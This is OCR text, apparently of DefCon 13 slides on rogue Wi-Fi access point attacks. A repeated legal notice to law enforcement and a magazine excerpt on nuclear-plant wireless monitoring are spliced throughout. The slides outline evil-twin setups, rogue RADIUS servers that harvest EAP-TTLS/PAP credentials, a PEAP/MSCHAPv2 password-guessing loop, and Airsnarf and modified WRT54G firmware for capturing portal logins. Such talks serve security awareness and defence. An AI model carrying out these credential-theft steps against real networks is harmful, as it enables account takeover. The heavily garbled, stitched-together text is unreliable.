Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email. 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



New Wi-Fi kung-fu from 

Beetle... 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "worts 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e , 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which rnay be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 







Why oh why do we Wi-Fi? 

• Who here has an open wireless 
network at home? At work? 



• Crap! My Tivo can't do WPA. 
Neither can my PSP. Ummm... 
does it matter? 



When and where should we Wi- 
Fi? 

- Coffee Shops? Airports? Hospitals? 
Banks? Ummm... Nuclear Power 

plants? DefCon 13 




NOTICE TO LAW 
ENFORCEMENT 
AGENTS 

The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "worts 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e , 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even "preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 
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I IT IN THE PLANT 



standards. The same infrastructure also will 
provide wired LAN connectivity throughout 
the plant for both voice and data applications 
as well as for remote video monitoring and 
control. 

According to Carter, TXU plans to use 
the wireless solution — provided by 
Azima — to help Comanche Peak integrate 
its work order management and scheduling 
processes, electronic procedures, clearance 
and safety tagging, operator logs, equip- 
ment monitoring, electronic messaging, 
plant drawings, phone books, equipment 
references and locations, and selected Inter- 
net/intranet access. Video applications will 
include radiation protection monitoring, 
remote equipment monitoring, and video 
conferencing. 

So far, Azima has installed monitoring 




4. Collecting the data. A typical 
wireless access point at Comanche Peak. 
So far, Azima has installed monitoring 
devices on more than 50 pieces of critical 
equipment within Unit 2. Courtesy: TXU 



devices on more than 50 pieces of critical 
equipment within Unit 2 of Comanche Peak. 
Besides vibration, the devices also monitor 
current, partial discharge, motor speed, and 
other key variables. Other wireless applica- 
tions already installed throughout the plant 
include mobile computing, video monitor- 
ing, and VoIP telephones (Figure 4). 

More wireless 
implementation stories 

Two other projects underscore the growing 
popularity of wireless machinery monitor- 
ing. One is at Exelon Nuclear’s Limerick 
Generating Station (Figure 5) in Mont- 
gomery County, Pa. The Limerick plant has 
had maintenance problems with the fans 
used to exhaust turbine enclosures. Nick- 
named “fans-in-a-can” because they are 
typically mounted inside cylindrical ducts, 
these fans are inaccessible to technicians 
while the plant is on-line. But since the 
installation of transmitter-equipped vibra- 
tion and temperature sensors on the fans’ 
motors, Limerick has seen reductions in the 
time and costs of document control and 
tracking, data conversion/transcription, and 
error checking/reduction. 

The other wireless monitoring project 
worth mentioning was at the San Onofre 
Nuclear Generating Station in California. 
Engineers at the plant had long wanted to 
remotely monitor the temperature of several 
2,500-hp secondary plant motors as an indi- 
cator of their health. According to Lloyd 




5. Watching those "fans in a can." At Exelon Nuclear's Limerick Generating 
Station, wireless technology is being used to monitor inaccessible fans and motors. Courtesy: 
Exelon Nuclear 



Pentecost, a maintenance engineer at the 
plant, “If a motor were to fail unexpectedly, 
the plant would have to operate at only 80% 
capacity for a number of days, and the loss- 
es could exceed $400,000.” Pentecost is 
pleased with the network of wireless tem- 
perature sensor/transmitters that has been 
installed at San Onofre because “Collecting 
and analyzing motor temperature data in 
real time allows action to be taken before a 
catastrophic failure occurs.” 

EPRI promotes wireless 

The Comanche Peak de-wiring project was 
executed in partnership with EPRI, which 
set up the performance benchmarks and 
monitored the project. EPRI plans to issue 
a comprehensive report on it this summer. 

Ramesh Shankar, who is spearheading 
an EPRI program to evaluate the feasibility 
of installing more remote monitoring sys- 
tems at U.S. utility generating stations, 
believes that wireless is a technology 
whose time has come. He says a major 
focus of the effort is to determine the extent 
to which wholesale deployment of wireless 
devices might improve plant safety and 
reliability. 

Shankar adds that his program already 
has two “products.” One lays out the busi- 
ness case for applying wireless technologies; 
the other offers advice to plant managers on 
implementation and regulatory issues. To 
support the effort, EPRI has formed a Wire- 
less Technology Working Group to develop 
guidelines and to help member companies 
achieve reliable, economical, and safe use of 
wireless devices. EPRI also has helped the 
DOE’s Oak Ridge National Laboratory form 
the Wireless Industrial Networking Alliance 
(WINA). The mission of WINA is to pro- 
mote a dialogue among suppliers, end users, 
and government about wireless technologies 
in the nation’s power plants. 

To accelerate the adoption of wireless 
technologies for machinery monitoring and 
data/voice/video communications, WINA 
is focusing on four different activities: 

Explaining wireless technologies to end 
users. 

■ Promoting effective standards, regula- 
tions, and practices. 

i Quantifying and communicating the 
benefits of going wireless. 
Benchmarking against customer 
requirements. 

Each year, WINA sponsors two wire- 
less workshops that are focused solely on 
the power generation industry. The next 
one is scheduled for October 3-5 in Jersey 
City, N.J. - 
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4. Collecting the data. A typical 
wireless access point at Comanche Peak. 
So far. Azima has installed monitoring 
devices on more than 50 pieces of critical 
equipment within Unit 2. Courtesy: TXU 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "worts 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e , 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 







Where did we go wrong? 
Where are we going? 

• Technology of convenience versus 
the inconvenience of securing it. 

• The poor, poor users were left out 
in the authentication cold. 

• Half-ass security standards pass 
the buck and / or provide defacto 
insecure options. 

• Security acronyms have taken 

precedence over proper 
implementation. DefCon 13 







” Choose a Mobile 
Network with Care.” 



For a low-priced mobile network, choose FI2G/FINNET. 







"CHOOSE A MOBILE 
NETWORK AT RANDOM!” 





‘Hello Switch to Ra&ohnp to 

the Vodatone network in Fuiand 





NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material” protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product material" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email. 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



How the FUCK does the 

user know?! 










DefCon 13 





SSID: “goodguy” 



> ' 



Stronger or Closer 
Access Point 




Wi-Fi Card 

SSID: “badguy” 









NOTICE TO LAW 
ENFORCEMENT 
AGENTS 

The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "worts 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e , 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 







Rogue AP Attacks 

Choose your Wi-Fi 
weapon... 



Cisco Gear @ 
lOOmW 
(20dBm) 



Normal 
Gear @ 
25 mW 
(14dBm) 



Senao Gear @ 
200mW 
(23dBm) 



Use a 15dBd 
antenna with a 
Senao for 
38dBd total... 

6 WATTS! 

VS 25m W ? 

BAD GUY 
WINS! NO 
CONTEST! 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wor* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e , 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even "preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 

The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wori< 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa) 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e , 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even "preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 

The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wor* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa) 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability rf 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even "preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Rogue APs won't go away... 

• Users will be users, and they WILL 
fall for access point 
"impersonators" . 

• If you didn't notice, phishing and 
identity theft are on the rise... and 
so is hotspot usage. 

• "Extra" wireless client profiles 
provide extra avenues of attack. 

• EAP is an acronym, not a catch-all. 










Gartner can blow us. 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Rogue RADIUS 

Who says rogue APs can't be used 
against corporate wireless 
networks? 

There are plenty of ways to screw 
up EAP. 

FreeRADIUS provides a simple & 
easy way to accept EAP 
credentials 










- Integrates nicely with hostapd. 

Can allow for “EAP Peeking"... 




NOTICE TO LAW 
ENFORCEMENT 
AGENTS 
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enforcement agents is very 
likely to result In a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 pit * *" ' — ' 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e . 
"stored ele^ ronic 

communications" as u. , 

the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are orotected 

by the ECPA from t .. 

even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such a'^iorized 
access There are v 
which may be taken ag Jnst law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 

email. Each of them 4: “— 1 

to collect SI 000 plus an legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 
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Authentication 
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EAP- Response 



EAP-Success 



EAP-Key 



EAP-Response / Identity 



EAP-Request 



EAP-Request 



EAP-Success & Key 
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enforcement agents is very 
likely to result In a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil |i , ~' >ility if 
they violate this statu'. 

In addition, there is email, i.e 
"stored electronic 

communications'' as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system C "'- K 
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communications are protected 
by the ECPA from seizure or 
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access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 

prevent such a ‘ 
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which may be taken against law 

angantg iinHtar 
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to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before se 
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enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil (•' -* 

they violate this statute. 

In addition, there is e mail, i.e , 
"stored eh[ 

communications'' as d 
the Electronic Commil 
Privacy Act (ECPA) 
been in storage less 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 

prevent such a*. 

access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to hav* 5 tnrpri 

email. Each of them u ..... 

to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 
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Secure Tunnel Established w/o Remote Certificate Check? 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 

The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "worts 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and ev 
has "work pr 
stored on this s 
to recover at 
damages of $1 
expenses Ag 
states may n 
from personal 
they violate this 

In addition, the 
"stored 
communication! 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 






EAP-TTLS w/Z 
PAP 
Attack? 



Wireless 

Wired 



Windows XP 
w/SP2 




EAP-TTLS w/ PAP 
over TLS 




RADIUS 

Server 

1 . Disassociate users. 

2. Learn username & 
password. 

3. Disassociate, copy creds 
to local EAP config. 

4. Impersonate victim with 
legit username & password 
whenever. 



Rogue AP w/ 
Rogue RADIUS 
Server 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "worts 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 

In addition, there is email, i.e , 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 







All Your PAP... Google for 
targets, if you like. ;) 
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All Your CAs... The "All or 
None" Vulnerability 



Protected EAP Properties 



When connecting: 

jV a l|d a t e 5 e e r c e r L ijP|-= ate 




Connect to these servers: 



frosted Root certification Authorities: 



L! ABA.ECOM Root CA A 

Autoridad Certificadora de ia Asociacion Nacional del Notaria 
Autoridad Certificadora del Coiegio Nacional de Correduria P 
Baltimore EZ by D5T 
Belgacom E-Trust Primary CA 
LJ C&.W HKf 5ecoreNet CA Class A 

□ C&W HKT SecureNet CA Class B v 

< I > 



Do not prompt User to authorize new servers or trusted 
certification authorities 



Select Authentication Method: 



Secured password (EAP-MSCMAP v2) 



Configure,,. 



Enable Fast R.econnect 



OK 



Cancel 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "worts 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and ev 
has "work pr 
stored on this s 
to recover at 
damages of $1 
expenses Ag 
states may n 
from personal 
they violate thi 

In addition, the 
"stored 
communication! 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 






Wireless 

Wired 



PEAP Attack? 



Windows XP SP2 



r 1 r - r - ' 




PEAP w/ 
MSCHAPv2 
over TLS 




Rogue AP w/ 
Rogue RADIUS 
Server 



RADIUS 

Server 

1. Disassociate users. 

2. Learn DOMAIN and 
username w/ rogue AP. 

3. Disassociate, seed 
local password file. 

4. User continuously 
attempts to re- 
authenticate. 

5. Repeat #3. 
Authentication success 
= correct password 
guessed! 




NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 



Wireless Weaponry for 

Windows 

But rogue AP attacks require a 
"sophisticated hacker", right? 
Wrong. 

SoftAP + TreeWalk + Apache + 
ActivePerl = Airsnarf for 
Windows 

- http : //airsnarf . shmo o . c om/airsnarf4 win . 

- “Evil Twin Access Points for Dummies" 










But why only run one rogue AP, 
when you can run two... pJdttee? 




NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 

Some material on this system is 
in preparation for public 
dissemination and is "wot* 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42, Section 2000aa), 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute. 

In addition, there is email, i.e., 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (EC PA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even ‘preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 
provision of the Act You can 
find them in USC 18. 2707 On 
this system you can expect 
multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 






Rogue Squadron 

Because it's SO hard to run 
Airsnarf (the SHELL script)... 

Rogue AP setup for the masses 

Modified WRT54G firmware 

- Based off of Ewrt 

- Adds username & password portal 
capture and logging 

Looks like this... 
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NOTICE TO LAW 
ENFORCEMENT 
AGENTS 



The owners and users of this 
system are exercising First 
Amendment rights 



Some material on this system is 
in preparation for public 
dissemination and is "worts 
product material" protected 
under The First Amendment 
Privacy Protection Act of 1980 
(USC 42. Section 2000aa). 
Note that this is a civil statute 
Violation of this statute by law 
enforcement agents is very 
likely to result in a civil suit as 
provided Section 2000aa-6 
Each and every person who 
has "work product matenal" 
stored on this system is entitled 
to recover at least minimum 
damages of $1000 plus all legal 
expenses Agents in some 
states may not be protected 
from personal civil liability if 
they violate this statute 



In addition, there is email, i.e , 
"stored electronic 

communications" as defined by 
the Electronic Communications 
Privacy Act (ECPA) which has 
been in storage less than 180 
days on this system Such 
stored electronic 

communications are protected 
by the ECPA from seizure or 
even "preventing authorized 
access without a warrant 
specific to each person's email 
Seizing the computer where 
this email resides would 
prevent such authorized 
access There are civil actions 
which may be taken against law 
enforcement agents under 



provision of the Act You can 
find them in USC 18. 2707 On 



this system you can expect 



multiple people to have stored 
email Each of them is entitled 
to collect SI 000 plus all legal 
expenses for violations of 
Section 2700 and 2703 Please 
ensure you have appropriate 
warrants before seizing this 
equipment 
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Airsnarf 




fVr Twsre Versaon: Rogue Squadron 0. 1 






Wireless-G Broadband Router 


WRT54G 


Setup 


Wireless 


Security Access Restrictions ^Gaming 1 * Administration 


Status 




Basic Setup | 


| MAC Addm | 





Internet Setup 



Internet Connection Type 



Optional Settings 
(required by some ISPs) 



Network Setup 



Router IP 



Network Address 
Server Settings (DHCP) 



Automatic Configuration - DHCP J ' 



Router Name: 
Host Name: 
Domain Name: 
MTU: 

Size: 



WRT54G 



Auto 



ID 



1500 



Local IP Address: 192 168 1 1 

